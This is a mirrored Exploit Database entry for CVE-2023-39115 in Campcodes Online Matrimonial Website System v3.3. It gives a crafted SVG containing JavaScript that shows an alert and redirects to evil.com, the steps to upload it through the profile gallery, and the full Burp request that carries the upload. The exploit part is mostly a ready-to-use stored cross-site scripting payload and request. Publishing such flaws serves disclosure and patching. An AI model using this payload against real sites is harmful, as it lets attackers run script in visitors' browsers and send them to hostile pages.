Campcodes Online Matrimonial Website System v3.3 – Code Execution via malicious SVG file upload

• Exploit Database
• 13 阅读

• 作者： Rajdip Dey Sarkar
  日期： 2023-08-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51656/

• # Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
  # Date: 3-8-2023
  # Category: Web Application
  # Exploit Author: Rajdip Dey Sarkar
  # Version: 3.3
  # Tested on: Windows/Kali
  # CVE: CVE-2023-39115
  
  
  
  Description:
  ----------------
  
  An arbitrary file upload vulnerability in Campcodes Online Matrimonial
  Website System Script v3.3 allows attackers to execute arbitrary code via
  uploading a crafted SVG file.
  
  
  SVG Payload
  ------------------
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
  http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
  stroke="#004400"/>
   <script type="text/javascript">
  alert("You have been hacked!!")
  
  
  window.location.href="https://evil.com"
   </script>
  </svg>
  
  
  Steps to reproduce
  --------------------------
  
   -Login with your creds
   -Navigate to this directory - /profile-settings
   -Click on Gallery -> Add New Image -> Browser -> Add Files
   -Choose the SVG file and upload done
   -Click the image!! Payload Triggered
  
  
  Burp Request
  -------------------
  
  POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
  Gecko/20100101 Firefox/115.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
  Content-Type: multipart/form-data;
  boundary=---------------------------167707198418121100152548123485
  Content-Length: 1044
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
  Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
  acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------167707198418121100152548123485
  Content-Disposition: form-data; name="relativePath"
  
  null
  -----------------------------167707198418121100152548123485
  Content-Disposition: form-data; name="name"
  
  file (1).svg
  -----------------------------167707198418121100152548123485
  Content-Disposition: form-data; name="type"
  
  image/svg+xml
  -----------------------------167707198418121100152548123485
  Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
  Content-Type: image/svg+xml
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
  http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
  stroke="#004400"/>
   <script type="text/javascript">
  alert("You have been hacked!!")
  
  
  window.location.href="https://evil.com"
   </script>
  </svg>
  -----------------------------167707198418121100152548123485--